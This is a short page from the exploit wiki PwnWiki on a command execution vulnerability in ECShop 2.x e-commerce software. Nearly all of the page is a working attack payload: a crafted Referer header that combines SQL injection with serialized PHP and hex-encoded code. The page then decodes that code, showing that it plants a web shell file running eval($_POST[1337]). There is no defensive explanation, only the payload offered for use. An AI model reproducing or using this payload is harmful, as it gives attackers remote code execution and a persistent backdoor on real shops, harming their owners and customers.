Ecshop2.x 命令執行漏洞

From PwnWiki
Revision as of 08:47, 23 April 2021 by Pwnwiki (talk | contribs) (建立內容為「==命令執行== <pre> Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286…」的新頁面)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

命令執行

Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}

生成Webshell

assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzEucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTMzN10pOyA/Picp'));//}xxx�
file_put_contents('1.php','<?php eval($_POST[1337]); ?>')
Retrieved from "https://pwnwiki.com/index.php?title=Ecshop2.x_命令執行漏洞&oldid=1874"